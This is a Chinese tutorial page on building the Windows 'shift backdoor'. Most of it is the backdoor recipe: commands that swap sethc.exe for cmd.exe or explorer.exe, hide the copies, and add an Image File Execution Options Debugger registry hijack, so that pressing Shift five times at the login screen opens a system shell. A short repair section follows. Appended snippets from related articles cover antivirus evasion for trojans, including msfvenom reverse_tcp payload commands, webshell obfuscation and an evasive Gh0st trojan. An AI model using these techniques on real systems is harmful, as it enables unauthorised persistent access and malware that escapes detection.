shift后门

article/2025/9/24 1:27:44

参考:https://blog.csdn.net/qq_43626025/article/details/122031653
shift后门
替换C:\windows\system32\sethc.exe为你想要启动的后门程序,这里替换为我们用最常见的cmd.exe。

这里要注意下,默认情况下我们需要先改变sethc的所有者,然后修改用户权限不然的话没办法操作。

执行以下命令

Move C:\windows\system32\sethc.exeC:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exeC:\windows\system32\sethc.exe

然后回到系统登录界面,连续按5次shift,调用cmd

在这里插入图片描述

一、如何制作shift后门
方法1
在cmd窗口,敲打命令如下:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h

attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。

(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)

方法2
将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去

找到 C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文件夹中

方法3
REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd

修复方法
1,运行“regedit”打开注册表

2,切换该位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

如果该目录下不存在sethc.exe项:

对着Image File Execution 右键 新建项 里面输入sethc.exe

对着新创建的sethc.exe右健,新建,字符串值,Debugger

双击新建的Debugger,在数值数据中填入afafagagag一些你胡乱打的数值

置完后最好设置下权限,Everyone 禁止 删除 禁止 设置项值

如果目录下存在sethc.exe项:

打开sethc.exe项 右面双击 Debugger 里面的内容改成afagagagag之类的(乱打就行),这样就免疫并且清除了 shift后门.


http://chatgpt.dhexx.cn/article/pBMSMnrF.shtml

相关文章

④开启shift后门实验报告

班级 计科1班 姓名 彭彭头 学号 时间 2022.05.13 成绩 实验项目名称 开启shift后门 实验目的 1、了解常用入侵主机的方法 2、掌握操作系统常见漏洞,并学会防范 实验内容 利用Windows7系统的shift漏洞,开启后门。 实验环境 操作系统&a…

Windows留后门--教程(五)——shift粘贴键后门

一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来…

后门之shift后门制作及修复方法

一、如何制作shift后门 方法1 在cmd窗口,敲打命令如下: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe h attr…

警惕免杀版Gh0st木马!

https://github.com/SecurityNo1/Gh0st2023 经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免…

PHP之一句话木马免杀

目录 免杀小技巧 1.字符串拼接方式&#xff0c;构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式&#xff0c;构造敏感函数。 <?php $a ass; $b er; $c t…

MSF(2)——各种木马的生成及简单的免杀

本专栏是笔者的网络安全学习笔记&#xff0c;一面分享&#xff0c;同时作为笔记 文章目录 前文链接木马生成免杀php 免杀Python 免杀分析木马文件编写免杀马打包exe 前文链接 WAMP/DVWA/sqli-labs 搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描&#xff0c;请求重发…

PHP一句话木马免杀

作者&#xff1a;小刚 一位苦于信息安全的萌新小白帽&#xff0c;记得关注给个赞&#xff0c;谢谢 本实验仅用于信息防御教学&#xff0c;切勿用于其它用途 PHP木马免杀小技巧 免杀小技巧1.字符串拼接方式&#xff0c;构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用…

一句话木马及免杀

这篇文章主要是总结一句话木马&#xff0c;并实现一句话木马的简单免杀&#xff0c;以及一个不死马的实现。 文章目录 一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马 不死马 一句话木马及原理 首…

cobalt strike木马免杀

0x001-针对powershell免杀 工具&#xff1a;Invoke-Obfuscation 操作实例&#xff1a; 1、利用CS生成powershell木马 2、进入invoke-Obsfuscation文件&#xff0c;使用powershell命令执行 3、利用powershell命令执行免杀后的ps1文件&#xff0c;成功上线 0x002 -针…

一句话木马以及免杀

此篇只讨论php&#xff0c;其实原理是相同的&#xff0c;本文的思路依然适用于其他语言 WAF一般都是维护一个规则库&#xff0c;记录webshell常用的函数、方法等等&#xff0c;通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警&#xff0c;但是规则匹配肯定会…

Python木马分离免杀(下载分离型)

渗透环境&#xff1a; 目标主机&#xff1a;win10-192.168.159.133-杀软360、火绒、微步云沙盒 攻击主机&#xff1a;kali-192.168.159.129 使用工具&#xff1a;msfconsole、pyinstaller、pycharm 木马制作过程&#xff1a; 1、msfconsole的msfvenom模块生成shellcode k…

关于木马免杀的一些方法

一、免杀简述 ​ 理论上讲&#xff0c;免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道&#xff0c;第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的&#xff0c;也就是说免杀技术⾄少是在 1989年以后才发展起来的。 ​ 1989年&#xff1a;第⼀款杀毒软件M…

MSF木马的免杀(三)

目录 MSF木马的免杀 C/C加载免杀 加图标 MSF木马的免杀 MSF下输入下列命令&#xff0c;生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOSTx.x.x.x LPORT8888 -e x86/shikata_ga_nai -i 15 -b \x00\ PrependMigratetrue Pre…

木马免杀平台

VirScan 《多引擎在线扫描平台》 访问&#xff1a;https://www.virscan.org/ VirusTotal 《威胁猎捕平台》 访问&#xff1a;https://www.virustotal.com/gui/home/upload Jotti 《恶意软件扫描系统》 访问&#xff1a;https://virusscan.jotti.org/ 腾讯哈勃分析系统 《文件…

绕过杀毒软件,免杀木马制作

绕过杀毒软件&#xff0c;免杀木马制作&#xff08;以AVG Anti Spyware杀毒软件为例&#xff09; 一、将Sever.exe打开&#xff0c;分块生成100个文件 二、使用AVG Anti Spyware查杀生成的文件&#xff0c;再二次处理&#xff0c;重复这个过程&#xff0c;直到缩小到很小的范围…

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOSTXXX LPORTXXX -e x86/shikata_ga_nai -i 12 -b \x00\ PrependMigratetrue PrependMIgrateProxsvchost.exe -f c > /root/Desktop/shellcode.c 这里我们生成…

后渗透-木马免杀

木马免杀 0x00 免杀 木马免杀的方法有很多种&#xff0c;如反转、异或、远程加载、加壳等&#xff0c;这里举例反转加异或 0x01 利用msfvenom制作木马 sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.12.135 LPORT5555 -f py > 2.py# -p 指定payload # LHO…

APT之木马静态免杀

前言 这篇文章主要是记录手动编写代码进行木马免杀&#xff0c;使用工具也可以免杀&#xff0c;只不过太脚本小子了&#xff0c;而且工具的特征也容易被杀软抓到&#xff0c;指不定哪天就用不了了&#xff0c;所以要学一下手动去免杀木马&#xff0c;也方便以后开发一个只属于…

【木马免杀】

文章目录 前言题目一.免杀需求&#xff0c;查杀技术&#xff0c;免杀技巧&#xff0c;免杀实战免杀需求查杀技术免杀技巧免杀实战webshell免杀&#xff1a;1.引用免杀2.可变变量3.二维数组4.数组交集5.回调函数6.编码 木马免杀&#xff1a;1.msf自带免杀2.msf捆绑免杀3.msf自带…

2021Kali -- 木马免杀制作

​知道为什么梦里的人都看不清脸么&#xff1f;因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF&#xff0c;演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b \x00 l…